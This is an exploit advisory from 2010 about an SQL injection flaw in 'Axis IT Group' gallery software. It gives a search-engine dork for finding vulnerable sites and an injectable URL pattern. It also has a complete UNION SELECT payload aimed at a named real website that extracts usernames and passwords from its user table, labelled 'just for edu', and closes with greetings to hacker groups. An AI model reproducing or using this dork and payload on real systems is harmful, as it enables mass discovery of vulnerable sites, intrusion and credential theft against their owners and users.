=====================================
Axis IT Group SQL Injection Vulnerability
=====================================


Author                 :: DrgpxX
Group                  :: Aras cyber Army
Email                  :: DrgPxX@yahoo.com
Discover               :: 23 june 2010
Critical Lvl           :: high
Publised               :: 24 june 2010
vender                 :: axisitgroup.com
---------------------------------------------------------------------------
Axis IT Group
~~~~~~~~~

Dork                   :: "Powered by Axis IT Group"  inurl:gallery-detail.php

~~~~~~~~~~~~~~~~~~

demo                   :: http://www.target.com/gallery-detail.php?id=[sqli]

~~~~~~~~~~~~~~~~~~~~~~~~~

Example Just For Edu   :: http://www.casiniranch.com/gallery-detail.php?id=-999.9%20UNION%20ALL%20SELECT%201,%28SELECT%20concat%28user.username,0x20,user.userpassword%29%20FROM%20%60casini%60.user%20LIMIT%200,1%29%20,3,4,5,6,7,8,9--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    D3stan,hackfaz,mehdi,hamed.err000r
    All Muslim , Turkish , iranian hackers

+++++++++++++++++++++++++++++++++++++++